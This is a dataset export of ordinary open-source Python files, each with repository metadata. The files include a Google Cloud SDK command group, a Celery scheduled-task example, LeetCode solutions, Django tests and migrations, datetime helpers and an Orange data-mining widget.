# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""The command group for cloud container operations."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from googlecloudsdk.calliope import base
from googlecloudsdk.command_lib.container import container_command_util
from googlecloudsdk.command_lib.container import flags
from googlecloudsdk.command_lib.container import messages
from googlecloudsdk.core import log
class NodePools(base.Group):
"""Create and delete operations for Google Kubernetes Engine node pools."""
@staticmethod
def Args(parser):
"""Add arguments to the parser.
Args:
parser: argparse.ArgumentParser, This is a standard argparser parser with
which you can register arguments. See the public argparse documentation
for its capabilities.
"""
flags.AddZoneAndRegionFlags(parser)
def Filter(self, context, args):
"""Modify the context that will be given to this group's commands when run.
Args:
context: {str:object}, A set of key-value pairs that can be used for
common initialization among commands.
args: argparse.Namespace: The same namespace given to the corresponding
.Run() invocation.
Returns:
The refined command context.
"""
context['location_get'] = container_command_util.GetZoneOrRegion
return context
| [
"[email protected]"
] | |
b2617614628599bfb4b9f00487c546159e392f55 | e663909cec3c4eda12bb705fce9a6dc901bb7d88 | /爬虫/day12 celery/案例/定时任务的使用/tasks.py | 4c40c0aff2ac3b0e98d732cc5040744ae7ff06b3 | [] | no_license | 1284753334/learning2 | a03f293965a652883503cae420d8b1ad11ae6661 | f2fcb3c856656cc8427768b41add3ee083487592 | refs/heads/master | 2023-01-30T23:18:26.951210 | 2020-12-20T15:57:18 | 2020-12-20T15:57:18 | 315,065,804 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 461 | py | from celery import Celery
from celery import Task
app = Celery('tasks', backend='redis://:[email protected]:6379/2',
broker='redis://:[email protected]:6379/2')
app.config_from_object('celery_config')
@app.task(bind=True)
def period_task(self):
print('period task done: {0}'.format(self.request.id))
# 运行work
# celery -A tasks worker -l info -P eventlet
# 运行定时的模块 .bat 启动任务 任务会自动执行
# celery -A tasks beat
| [
"[email protected]"
] | |
e50c5b58cede70ff4ee4e99a6462a2a0bfa66ebb | 1c390cd4fd3605046914767485b49a929198b470 | /leetcode/number-of-ways-to-reorder-array-to-get-same-bst.py | 20d18c287b19a6543b31a2e3550bee7c771d1829 | [] | no_license | wwwwodddd/Zukunft | f87fe736b53506f69ab18db674311dd60de04a43 | 03ffffee9a76e99f6e00bba6dbae91abc6994a34 | refs/heads/master | 2023-01-24T06:14:35.691292 | 2023-01-21T15:42:32 | 2023-01-21T15:42:32 | 163,685,977 | 7 | 8 | null | null | null | null | UTF-8 | Python | false | false | 320 | py | class Solution:
def numOfWays(self, a: List[int]) -> int:
z = factorial(len(a))
def F(a):
nonlocal z
if a:
z //= len(a)
F([i for i in a if i < a[0]])
F([i for i in a if i > a[0]])
F(a)
return (z - 1) % 1000000007 | [
"[email protected]"
] | |
d84008737b9bd1f9dcb63e284d0f2f7a674116bc | d880b55d45726a9b9b12d24b059769350eeb6fb6 | /app/tests/test_eventactions.py | 0d49b3c282c0d5aaafc4cee1e7dc907315c8b1b1 | [
"Apache-2.0"
] | permissive | twatchy/cito_engine | 261a0bbf0dbdf1fe8cca19f598972307bc7df1c7 | a62dce3c76567dd36b7efcaa70e03728b335f44e | refs/heads/master | 2020-04-21T11:36:25.187256 | 2016-11-01T03:37:13 | 2016-11-01T03:37:13 | 169,531,529 | 0 | 0 | Apache-2.0 | 2019-02-07T06:57:48 | 2019-02-07T06:57:43 | Python | UTF-8 | Python | false | false | 4,329 | py | """Copyright 2014 Cyrus Dasadia
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from time import time
from mock import patch, call
from django.test import TestCase
from cito_engine.models import Incident, IncidentLog, EventActionCounter
from cito_engine.poller.event_poller import EventPoller
from . import factories
class TestEventActions(TestCase):
"""
X = 2, Y=100
Case 1
* One incident in T secs
* 2nd at T+10, 3rd at T+11, 4th at T+51
* Assert we have 1 single incident, 4 logs and event action executed once
* 5th incident occurs at T+101
* Assert counters are reset
* 6th incident occurs at T+151
* Assert event action is executed for the second time
"""
def setUp(self):
self.event = factories.EventFactory.create()
self.eventaction = factories.EventActionFactory.create(event=self.event,threshold_count=2, threshold_timer=100)
@patch('cito_engine.actions.incidents.requests')
def test__single_event_action_execution(self, mock_requests):
T = int(time())
raw_incident = '{ "event": {"eventid":"%s", "element":"foo", "message":"omgwtfbbq"}, "timestamp": %d}' % (self.event.id, T)
eventpoller = EventPoller()
self.assertTrue(eventpoller.parse_message(raw_incident))
incident = Incident.objects.filter()[0]
eacounter = EventActionCounter.objects.get(incident=incident)
self.assertFalse(eacounter.is_triggered)
# 2nd incident
raw_incident = '{ "event": {"eventid":"%s", "element":"foo", "message":"omgwtfbbq"}, "timestamp": %d}' % (
self.event.id, T+10)
self.assertTrue(eventpoller.parse_message(raw_incident))
eacounter = EventActionCounter.objects.get(incident=incident)
self.assertTrue(eacounter.is_triggered)
#3rd incident
raw_incident = '{ "event": {"eventid":"%s", "element":"foo", "message":"omgwtfbbq"}, "timestamp": %d}' % (
self.event.id, T + 11)
self.assertTrue(eventpoller.parse_message(raw_incident))
eacounter = EventActionCounter.objects.get(incident=incident)
self.assertTrue(eacounter.is_triggered)
# 4th incident
raw_incident = '{ "event": {"eventid":"%s", "element":"foo", "message":"omgwtfbbq"}, "timestamp": %d}' % (
self.event.id, T + 51)
self.assertTrue(eventpoller.parse_message(raw_incident))
eacounter = EventActionCounter.objects.get(incident=incident)
self.assertTrue(eacounter.is_triggered)
#We should have one incident and 4 incident logs
self.assertEqual(Incident.objects.count(), 1)
self.assertEqual(IncidentLog.objects.count(), 4)
# Assert we only execute plugin once
self.assertEqual(mock_requests.post.call_count, 1)
# 5th incident after time window
raw_incident = '{ "event": {"eventid":"%s", "element":"foo", "message":"omgwtfbbq"}, "timestamp": %d}' % (
self.event.id, T + 101)
self.assertTrue(eventpoller.parse_message(raw_incident))
eacounter = EventActionCounter.objects.get(incident=incident)
self.assertFalse(eacounter.is_triggered)
# Assert we did not execute plugin yet
self.assertEqual(mock_requests.post.call_count, 1)
# 6th incident after time window
raw_incident = '{ "event": {"eventid":"%s", "element":"foo", "message":"omgwtfbbq"}, "timestamp": %d}' % (
self.event.id, T + 121)
self.assertTrue(eventpoller.parse_message(raw_incident))
eacounter = EventActionCounter.objects.get(incident=incident)
self.assertTrue(eacounter.is_triggered)
# Assert event action occurred for the second time
self.assertEqual(mock_requests.post.call_count, 2)
#todo create tests to check use cases mentioned in the comments | [
"[email protected]"
] | |
97881fac8f0fc31d32cb2dcfab394222d5961334 | 9bd6caf9c42ac67dfcb120af272d8e65d8f6a9f6 | /venv/bin/python-config | 473844071904928c2233c7ec06d5e3c88290dd42 | [] | no_license | haedal-with-knu/KNUstudents | f6da8e8c112af317addeb1cccaca9f3bfa6bcacc | 6fc88e5699cc27fbf9f7b6437d84b249e450232e | refs/heads/master | 2020-06-30T13:25:20.994394 | 2019-10-13T14:58:36 | 2019-10-13T14:58:36 | 200,837,311 | 1 | 6 | null | 2019-10-13T14:06:47 | 2019-08-06T11:24:16 | CSS | UTF-8 | Python | false | false | 2,360 | #!/Users/kangminchoi/haedal/KNUstudents/venv/bin/python
import sys
import getopt
import sysconfig
valid_opts = ['prefix', 'exec-prefix', 'includes', 'libs', 'cflags',
'ldflags', 'help']
if sys.version_info >= (3, 2):
valid_opts.insert(-1, 'extension-suffix')
valid_opts.append('abiflags')
if sys.version_info >= (3, 3):
valid_opts.append('configdir')
def exit_with_usage(code=1):
sys.stderr.write("Usage: {0} [{1}]\n".format(
sys.argv[0], '|'.join('--'+opt for opt in valid_opts)))
sys.exit(code)
try:
opts, args = getopt.getopt(sys.argv[1:], '', valid_opts)
except getopt.error:
exit_with_usage()
if not opts:
exit_with_usage()
pyver = sysconfig.get_config_var('VERSION')
getvar = sysconfig.get_config_var
opt_flags = [flag for (flag, val) in opts]
if '--help' in opt_flags:
exit_with_usage(code=0)
for opt in opt_flags:
if opt == '--prefix':
print(sysconfig.get_config_var('prefix'))
elif opt == '--exec-prefix':
print(sysconfig.get_config_var('exec_prefix'))
elif opt in ('--includes', '--cflags'):
flags = ['-I' + sysconfig.get_path('include'),
'-I' + sysconfig.get_path('platinclude')]
if opt == '--cflags':
flags.extend(getvar('CFLAGS').split())
print(' '.join(flags))
elif opt in ('--libs', '--ldflags'):
abiflags = getattr(sys, 'abiflags', '')
libs = ['-lpython' + pyver + abiflags]
libs += getvar('LIBS').split()
libs += getvar('SYSLIBS').split()
# add the prefix/lib/pythonX.Y/config dir, but only if there is no
# shared library in prefix/lib/.
if opt == '--ldflags':
if not getvar('Py_ENABLE_SHARED'):
libs.insert(0, '-L' + getvar('LIBPL'))
if not getvar('PYTHONFRAMEWORK'):
libs.extend(getvar('LINKFORSHARED').split())
print(' '.join(libs))
elif opt == '--extension-suffix':
ext_suffix = sysconfig.get_config_var('EXT_SUFFIX')
if ext_suffix is None:
ext_suffix = sysconfig.get_config_var('SO')
print(ext_suffix)
elif opt == '--abiflags':
if not getattr(sys, 'abiflags', None):
exit_with_usage()
print(sys.abiflags)
elif opt == '--configdir':
print(sysconfig.get_config_var('LIBPL'))
| [
"[email protected]"
] | ||
0cc996327080cef74cacd4ca115b5b1872936fa0 | 0e78b2df0fb93afc62684dece8ac05b700570248 | /BOJ/10833.py | 06f397ce5fd59451cdaa7e04768b716105b35bc1 | [] | no_license | ajy720/Algorithm | f1e2301327db09667ba011bc317c8f380707c25c | b141538802e9056f154ab91c816ad29500505f34 | refs/heads/master | 2022-05-06T21:37:05.780170 | 2022-04-23T09:25:52 | 2022-04-23T09:25:52 | 200,335,390 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 102 | py | ans = 0
for _ in ' '*int(input()):
a, b = map(int, input().split())
ans += b % a
print(ans)
| [
"[email protected]"
] | |
f6f725cc17fc1faf7eac0a28e5e4359dcb58b5a7 | 3c94e55a1f2a41bdebd7a174c84c560283754b92 | /coffeecoin_admin/wsgi.py | 86e4bf45b6775b5ca4142c8a61f54a6eb322d346 | [] | no_license | coinmenace/coffeecoin_admin | 2542bca5f186b117a4d2b90cdde7cdbfa7ad6f3b | 65ceaa4ffba319fac3286388b572d19cde646bb0 | refs/heads/master | 2020-03-27T04:15:57.482384 | 2018-08-24T01:22:39 | 2018-08-24T01:22:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 410 | py | """
WSGI config for coffeecoin_admin project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "coffeecoin_admin.settings")
application = get_wsgi_application()
| [
"[email protected]"
] | |
20691830fbf91a5caae39677d6ec0024590b522a | 72b00923d4aa11891f4a3038324c8952572cc4b2 | /python/datastruct/dd_oob/pgm07_28.txt | c1f7f8084c1a8e16b2bdb107bdc35ca04776988a | [] | no_license | taowuwen/codec | 3698110a09a770407e8fb631e21d86ba5a885cd5 | d92933b07f21dae950160a91bb361fa187e26cd2 | refs/heads/master | 2022-03-17T07:43:55.574505 | 2022-03-10T05:20:44 | 2022-03-10T05:20:44 | 87,379,261 | 0 | 0 | null | 2019-03-25T15:40:27 | 2017-04-06T02:50:54 | C | UTF-8 | Python | false | false | 722 | txt | #
# This file contains the Python code from Program 7.28 of
# "Data Structures and Algorithms
# with Object-Oriented Design Patterns in Python"
# by Bruno R. Preiss.
#
# Copyright (c) 2003 by Bruno R. Preiss, P.Eng. All rights reserved.
#
# http://www.brpreiss.com/books/opus7/programs/pgm07_28.txt
#
class SortedListAsArray(OrderedListAsArray, SortedList):
def withdraw(self, obj):
if self._count == 0:
raise ContainerEmpty
offset = self.findOffset(obj)
if offset < 0:
raise KeyError
i = offset
while i < self._count:
self._array[i] = self._array[i + 1]
i += 1
self._array[i] = None
self._count -= 1
# ...
| [
"[email protected]"
] | |
2a0f864a90d2c9af31adaade203406309f66c9d1 | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_333/ch77_2020_04_13_15_29_15_904054.py | a10778292bfbe71d82aaf9be4a6d5a915023fc82 | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 348 | py | import math
def calcula_tempo(dicionario):
nome_tempo={}
for nome_e_aceleracao in dicionario:
nome=nome_e_aceleracao[0]
aceleracao=nome_e_aceleracao[1]
tempo=aceleracao_tempo(int(aceleracao))
nome_tempo[nome]=tempo
return nome_tempo
def aceleracao_tempo(a):
t=math.sqrt(200/a)
return t
| [
"[email protected]"
] | |
8ea08f6a84070e59475e3de8786df6296cbdddd9 | a989ff888d86eaad7d3572993d89af17bb29c7ec | /kartverket_stormsurge/helper/datetimes.py | 981e44efed210c6a738f00d83a0f60092b15ec65 | [
"MIT"
] | permissive | jerabaul29/kartverket_storm_surge_data | 8f873232a3aff92f07a73220e51f8385278a029a | 9a35492550ec8b3f4c0b7f1d17bf3bb4776f2c49 | refs/heads/master | 2023-01-31T02:17:34.834755 | 2020-12-15T10:30:54 | 2020-12-15T10:30:54 | 287,529,304 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,229 | py | import datetime
import pytz
from kartverket_stormsurge.helper.raise_assert import ras
def assert_is_utc_datetime(date_in):
"""Assert that date_in is an UTC datetime."""
ras(isinstance(date_in, datetime.datetime))
if not (date_in.tzinfo == pytz.utc or
date_in.tzinfo == datetime.timezone.utc):
raise Exception("not utc!")
if date_in.tzinfo == pytz.utc:
print("prefer using datetime.timezone.utc to pytz.utc")
def assert_10min_multiple(date_in):
"""Assert that date_in is a datetime that is a
multiple of 10 minutes.
"""
ras(isinstance(date_in, datetime.datetime))
ras(date_in.second == 0)
ras((date_in.minute % 10) == 0)
ras(date_in.microsecond == 0)
def datetime_range(datetime_start, datetime_end, step_timedelta):
"""Yield a datetime range, in the range [datetime_start; datetime_end[,
with step step_timedelta."""
assert_is_utc_datetime(datetime_start)
assert_is_utc_datetime(datetime_end)
ras(isinstance(step_timedelta, datetime.timedelta))
ras(datetime_start < datetime_end)
ras(step_timedelta > datetime.timedelta(0))
crrt_time = datetime_start
yield crrt_time
while True:
crrt_time += step_timedelta
if crrt_time < datetime_end:
yield crrt_time
else:
break
def datetime_segments(datetime_start, datetime_end, step_timedelta):
"""Generate a succession of segments, that cover [datetime_start; datetime_end].
The segments will have length step_timedelta, except possibly the last segment
that may be shorter."""
assert_is_utc_datetime(datetime_start)
assert_is_utc_datetime(datetime_end)
ras(isinstance(step_timedelta, datetime.timedelta))
ras(datetime_start < datetime_end)
ras(step_timedelta > datetime.timedelta(0))
crrt_segment_start = datetime_start
crrt_segment_end = crrt_segment_start + step_timedelta
while True:
if crrt_segment_end >= datetime_end:
yield (crrt_segment_start, datetime_end)
break
else:
yield (crrt_segment_start, crrt_segment_end)
crrt_segment_start += step_timedelta
crrt_segment_end += step_timedelta
| [
"[email protected]"
] | |
3f1602c001f4b70e038794a08ba4c725871c4198 | 040bd1995190e858299fcdd716bd986aa0664d13 | /Trees and Graphs/MaxiumumDepthOfBinaryTree.py | 04b51d71defc1958be86b73fc93dbac3a0196e5e | [] | no_license | PravinSelva5/LeetCode_Grind | 7c568d68231ff34332d756237e79ca8d19cebfec | aa5fb8eb12b1e1903cb0cb688dc41f959e4caf6a | refs/heads/master | 2023-02-08T13:05:10.355867 | 2021-01-05T02:55:29 | 2021-01-05T02:55:29 | 271,690,775 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,066 | py | '''
Given the root of a binary tree, return its maximum depth.
A binary tree's maximum depth is the number of nodes along the longest path from the root node down to the farthest leaf node
--------------------
RESULTS
--------------------
Time Complexity: O(N)
Space Complexity: O(H), H represents the height of the tree
Runtime: 32 ms, faster than 97.68% of Python3 online submissions for Maximum Depth of Binary Tree.
Memory Usage: 16.2 MB, less than 33.21% of Python3 online submissions for Maximum Depth of Binary Tree.
'''
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
class Solution:
def maxDepth(self, root: TreeNode) -> int:
if root == None:
return 0
if root.left == None and root.right == None:
return 1
left = self.maxDepth(root.left)
right = self.maxDepth(root.right)
return max(left, right) + 1 | [
"[email protected]"
] | |
633981c5580abc6b32852ac0098516780d0c8861 | d9563f113fa4dcbf6dadb5ea186d69839f372119 | /pedidos/migrations/0004_auto_20191129_1821.py | 08c3d750eba80e0bc31f5b96aa8c4b9131fc203e | [] | no_license | CarlosSanz81/serv | 717eefea1ead9325472cef165f2326a14dd355cd | dd3cb5b022b8b939ff6ea502b8335c257d057abb | refs/heads/master | 2020-09-16T03:41:16.306550 | 2019-12-05T12:41:01 | 2019-12-05T12:41:01 | 223,640,310 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 406 | py | # Generated by Django 2.2.7 on 2019-11-29 17:21
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('pedidos', '0003_archivo'),
]
operations = [
migrations.AlterField(
model_name='archivo',
name='nombre',
field=models.FileField(blank=True, null=True, upload_to='./media/'),
),
]
| [
"[email protected]"
] | |
c92c8e96486ba05e3cf7c3d52836a06125a9a899 | 3d0ae7c8693463faa11bacad8e6ea9d0d70b9eb1 | /nlp/3rdParty/orange/orange/OrangeWidgets/Prototypes/OWPreprocessing.py | 168864c2174450afb47cb0f7ac89fb6b1324b927 | [] | no_license | stefie10/slu_hri | a76f79094bd1740676fec5d889411ba3b1d9dc26 | 50753379953e1ff822162eeab094cffe4a30f3e1 | refs/heads/master | 2022-12-14T01:07:51.522258 | 2020-08-31T00:50:12 | 2020-08-31T00:50:12 | 291,386,375 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,742 | py | """
<name>Preprocessing</name>
<description>Constructs data preprocessors.</description>
<icon>icons/FeatureConstructor.png</icon>
<priority>11</priority>
<contact>Janez Demsar (janez.demsar(@at@)fri.uni-lj.si)</contact>
"""
from OWWidget import *
import OWGUI, math, re
from orngWrap import Preprocessor
class OWPreprocessing(OWWidget):
contextHandlers = {"": PerfectDomainContextHandler()}
def __init__(self,parent=None, signalManager = None):
OWWidget.__init__(self, parent, signalManager, "Preprocessing")
self.inputs = [("Examples", ExampleTable, self.setData)]
self.outputs = [("Preprocessor", Preprocessor), ("Examples", ExampleTable)]
OWGUI.button(self.controlArea, self, "Apply", callback=self.apply)
self.loadSettings()
self.apply()
self.adjustSize()
def setData(self, data):
self.data = data
self.sendData()
def sendData(self):
if not self.data or not self.preprocessor:
self.preprocessed = self.data
else:
self.preprocessed = self.preprocessor.processData(self.data)
self.send("Examples", self.preprocessed)
def apply(self):
# The widget needs to construct a new instance of Preprocessor
# If it modified and send the same instance every time, it would
# modify an instance which has been passed to another widget which
# might have a disabled connection and should not get any modifications
# (and would even not get notified about the preprocessor having been changed)
self.preprocessor = Preprocessor()
self.send("Preprocessor", self.preprocessor)
| [
"[email protected]"
] | |
484b36d95ccf1122a18ef55f269dda7d400b80d3 | 1e19cab9c19562477cf561a88949faeee3731015 | /quanbenxiaoshuo/novels/apps.py | 19579c3e8a0d90b30a3869db99775e9dc90b0c58 | [] | no_license | sugyli/a_dou | 62f5c3090f4001b68613a0b7c30526a58f512aa7 | 4c3121495416361d7f4bfe97e3ed15c61c28f1e3 | refs/heads/master | 2021-06-24T12:30:44.018193 | 2019-12-02T05:27:41 | 2019-12-02T05:27:41 | 205,197,259 | 0 | 0 | null | 2021-02-08T20:36:17 | 2019-08-29T15:45:23 | JavaScript | UTF-8 | Python | false | false | 120 | py | from django.apps import AppConfig
class NovelsConfig(AppConfig):
name = 'novels'
verbose_name=u'小说管理'
| [
"“[email protected]”"
] |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.